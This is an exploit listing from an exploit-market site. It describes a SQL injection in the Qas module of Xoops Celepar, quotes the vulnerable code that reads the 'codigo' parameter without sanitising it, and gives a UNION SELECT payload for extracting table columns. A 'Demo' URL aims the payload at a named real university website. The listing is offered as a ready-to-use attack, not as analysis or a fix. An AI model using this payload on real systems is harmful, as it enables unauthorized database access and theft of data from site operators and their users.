[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Xoops Celepar Module Qas (codigo) SQL Injection Vulnerability

Author
s4r4d0
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-5538
Category
web applications
Date add
23-07-2009
Platform
unsorted
=============================================================
Xoops Celepar Module Qas (codigo) SQL Injection Vulnerability
=============================================================


**********************************************************************************************************
Xoops Celepar Module Qas
Donwload of Xoops Celepar : http://www.xoops.pr.gov.br/uploads/core/xoopscelepar.tar.gz
Author: s4r4d0
**********************************************************************************************************
A Sql Injection has been found on modules Quas of Xoops Celepar in file Aviso.php .
Source code:
    }
    $codigo = $_POST['codigo'];
} else
    $codigo = $_GET['codigo'];
***********************************************************************************************************
Target: site.com.br/modules/qas/aviso.php?codigo=
Sql Code :-1+UNION+SELECT+1,2,columnname,4,5,6,7,8+from+tablename
Demo: http://www.dce.uem.br/modules/qas/aviso.php?codigo=-1+UNION+SELECT+1,2,3,4,5,6,7,8--
***********************************************************************************************************



#  0day.today [2024-12-24]  #